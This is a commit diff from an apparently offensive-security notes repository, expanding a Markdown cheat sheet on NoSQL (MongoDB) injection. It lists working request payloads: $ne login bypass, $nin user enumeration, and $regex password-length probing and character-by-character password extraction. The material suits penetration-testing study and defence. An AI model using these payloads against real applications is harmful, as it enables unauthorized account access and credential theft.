whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

cleanup and some more info

This commit is contained in:
gurkenhabicht 2024-07-09 23:20:00 +02:00
parent bb4cd3b7d1
commit edd1c69e13
1 changed files with 62 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

69
Exploits/Databases/NoSQL Injection.md
View File

@ -3,6 +3,11 @@
* No tables, but files (collections) * No tables, but files (collections)
* Examples are Elasticsearch, MongoDB, Redis, CouchDB. * Examples are Elasticsearch, MongoDB, Redis, CouchDB.
Here we are using MongoDB as an example. It is a file database using the
following structure.
Key & value pairs are stored in a file, which are grouped
in a collections inside a database.
## Querying ## Querying
* Filter instead of SQL queries * Filter instead of SQL queries
@ -12,7 +17,8 @@
## Operators ## Operators
* A precondition to the injection is to know the most common operators listed below A precondition to the injection is to know the most common operators listed below.
```sql ```sql
$and $and
$or $or
@ -24,28 +30,77 @@ $exists
$regex $regex
``` ```
## Filters
Filter data via using key value pairs inside arrays in the following
syntactical style.
```sql
['user' => 'admin']
['age' => ['$gt' => '42']]
```
## Injection ## Injection
The payload is delivered inside the parameters of the request. To deliver malicious payload the operators can be negated. That means the for example all users except the known one used in the request is included in the response from the database server. The payload is delivered inside the parameters of the request. To deliver
malicious payload the operators can be negated. That means the for example all
users except the known one used in the request is included in the response from
the database server.
Pass HTTP parameter as an array instead of `user=` and `password=` visible in
the following example.
* Pass HTTP parameter as an array instead of `user=` and `password=` use
```sh ```sh
user[$operator]=foo&password[$operator]=bar user[$operator]=foo&password[$operator]=bar
``` ```
* Give a 2D array a chance as well while fiddling with the request in following way Another method, login and concat all the users you'll find afterwards until
every user has been listed in following way.
```sh ```sh
user[$nin][]=foo user[$nin][]=admin&password[$ne]=securepassword
user[$nin][]=admin&user[$nin][]=user2&password[$ne]=securepassword
user[$nin][]=admin&user[$nin][]=foouser&user[$nin][]=baruser&password[$ne]=securepassword
``` ```
### Examples ### Examples
* POST or GET parameters For example the filter including the operator `$ne` is the following.
```sql
['user'=>['$ne'=>'foo'],'password'=>['$ne'=>'bar']]
```
The body of a POST request would look like this following example.
```sh
user[$ne]=foo&password[$ne]=bar
```
POST or GET parameters are both possible.
```sh ```sh
username=admin&password[$ne]=admin username=admin&password[$ne]=admin
``` ```
* JSON JSON
```json ```json
{"username":"user","password":{"$ne":""} } {"username":"user","password":{"$ne":""} }
``` ```
Use regex to unravel the password. Check the length of the password
and hopefully get a boolean if the length is correct, `True` or `False`.
The return value may be an error a redirect or some other side channel to
measure the respone with.
```sh
user=admin&pass[$regex]=^.{6}$
```
When you've found the correct length try bruteforcing the password via regex
one char after another
```sh
user=admin&password[$regex]=^p.....$
```